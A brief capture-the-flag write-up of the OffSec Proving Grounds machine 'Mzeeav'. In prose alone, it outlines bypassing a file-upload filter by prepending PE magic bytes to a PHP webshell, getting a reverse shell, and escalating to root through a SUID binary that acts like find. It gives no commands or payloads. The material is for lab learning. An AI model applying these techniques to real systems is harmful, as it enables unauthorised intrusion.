Mzeeav Proving Grounds Write-Up

SUMMARY

This write-up covers the Mzeeav machine from Offsec’s Proving Grounds, a Linux machine where a file upload filter was bypassed using PE magic bytes.

Port 80 hosted a file upload service. A backup ZIP found through directory fuzzing contained the PHP source code, revealing that upload.php validated files based on PE magic bytes (Windows executable signature). Prepending the .exe magic bytes to a PHP webshell and intercepting the upload with Burp Suite bypassed the filter. The uploaded file was accessed at /uploads/cmd.php, confirming command execution as www-data. A reverse shell followed.

Privilege escalation was discovered via a custom SUID binary named fileS in /opt. Running it produced output identical to find. The GTFOBins technique for SUID find was applied, spawning a root shell.

---

PATH TO FOLLOW

1. Reconnaissance & File Upload Portal Discovery
2. Backup ZIP Extraction → upload.php Source Code Review
3. PE Magic Bytes Prepend → PHP Webshell Upload Bypass
4. Webshell Access → Reverse Shell as www-data
5. SUID fileS Discovery → GTFOBins find Abuse → Shell as Root

Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.I know, boring stuff.